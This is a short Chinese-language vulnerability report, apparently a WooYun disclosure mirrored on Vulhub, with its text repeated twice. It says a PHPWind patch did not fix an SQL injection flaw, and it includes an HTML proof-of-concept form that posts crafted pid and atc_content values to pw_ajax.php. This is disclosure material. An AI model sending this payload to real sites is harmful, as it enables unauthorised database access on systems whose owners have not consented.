VULHUB ™

### 简要描述： 相关安全部门没有尽到安全响应的响应职责，未深刻理解漏洞原因，未与开发部门协调真实的解决问题，导致漏洞根本没补，却出了一个所谓的补丁，完成了一个“我们在第一时间就做出了响应，当天就已经修复并发布”的漏洞响应。 ### 详细说明： [WooYun: PHPWIND最新版本SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2011-02720) 我是通过gpc提交的atc_content为:pid，而不是[:pid]，我确实不知道你们补丁到底是在干什么。 ### 漏洞证明： ``` <form method="post" action="http://127.0.0.1/phpwind/pw_ajax.php?action=leaveword"> <input name="step" value="2"> <input name="verify" value="2367d749"> <input name="tid" value="1"> <input name="pid" value="#"> <input name="atc_content" value=":pid"> <input name="submit" type="submit"> </form> ```

### 简要描述： 相关安全部门没有尽到安全响应的响应职责，未深刻理解漏洞原因，未与开发部门协调真实的解决问题，导致漏洞根本没补，却出了一个所谓的补丁，完成了一个“我们在第一时间就做出了响应，当天就已经修复并发布”的漏洞响应。 ### 详细说明： [WooYun: PHPWIND最新版本SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2011-02720) 我是通过gpc提交的atc_content为:pid，而不是[:pid]，我确实不知道你们补丁到底是在干什么。 ### 漏洞证明： ``` <form method="post" action="http://127.0.0.1/phpwind/pw_ajax.php?action=leaveword"> <input name="step" value="2"> <input name="verify" value="2367d749"> <input name="tid" value="1"> <input name="pid" value="#"> <input name="atc_content" value=":pid"> <input name="submit" type="submit"> </form> ```